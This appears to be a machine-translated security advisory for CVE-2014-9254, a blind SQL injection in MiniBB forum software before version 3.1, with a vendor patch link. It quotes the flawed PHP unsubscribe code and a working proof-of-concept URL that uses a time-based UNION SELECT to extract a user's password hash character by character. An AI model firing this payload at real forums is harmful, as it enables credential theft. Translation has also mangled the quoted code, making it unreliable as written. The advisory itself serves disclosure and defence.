MiniBB "code" SQL Injection Vulnerability

MiniBB "code" SQL Injection Vulnerability

Release date:
Updated on:

Affected Systems:
MiniBB <3.1
Description:
CVE (CAN) ID: CVE-2014-9254

MiniBB is an independent and open-source online forum constructor.

In versions earlier than MiniBB 3.1, when "action" is set to "unsubscribe", the "code" parameter value of bb_func_unsub.php is not properly filtered. Attackers inject arbitrary SQL code, this vulnerability allows you to manipulate SQL queries.

<* Source: Kacper Szurek

Link: http://secunia.com/advisories/61794/
*>

Test method:

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
# Exploit Title: min Ibb 3.1 Blind SQL Injection
# Date: 23-11-2014
# Software Link: http://www.minibb.com/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# CVE: CVE-2014-9254
# Category: webapps

1. Description

Preg_match () only check if $ _ GET ['code'] contains at least one letter or digit (missing ^ and $ inside regexp ).

File: bb_func_unsub.php
$ Usrid = (isset ($ _ GET ['usrid'])? $ _ GET ['usrid'] + 0: 0 );

$ AllowUnsub = FALSE;
$ ChkCode = FALSE;

If (isset ($ _ GET ['code']) and preg_match ("# [a-zA-Z0-9] + #", $ _ GET ['code']) {
// Trying to unsubscribe directly from email
$ ChkField = 'email _ Code ';
$ ChkVal = $ _ GET ['code'];
$ UserCondition = TRUE;
$ ChkCode = TRUE;
}
Else {
// Manual unsubsribe
$ ChkField = 'user _ id ';
$ ChkVal = $ user_id;
$ UserCondition = ($ usrid = $ user_id );
}

If ($ topic! = 0 and $ usrid> 0 and $ userCondition and $ ids = db_simpleSelect (0, $ Ts, 'Id, user_id ', 'topic _ id',' = ', $ topic, '','', $ chkField, '=', $ chkVal ))

Http://security.szurek.pl/minibb-31-blind-sql-injection.html

2. Proof of Concept

Http: // minibb-url/index. php? Action = unsubscribe & usrid = 1 & topic = 1 & code = test'union SELECT 1, IF (substr (user_password, 1, 1) = CHAR (99), SLEEP (5 ), 0) FROM minibbtable_users WHERE user_id = 1 AND username! ='

This SQL will check if first password character user ID = 1 is & #147; c & #148 ;.

If yes, it will sleep 5 seconds.

3. Solution:

Http://www.minibb.com/forums/news-9/blind-sql-injection-fix-6430.html

Suggestion:
Vendor patch:

MiniBB
------
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:

MiniBB:
Http://www.minibb.com/forums/news-9/blind-sql-injection-fix-6430.html

Kacper Szurek:
Http://security.szurek.pl/minibb-31-blind-sql-injection.html

This article permanently updates the link address: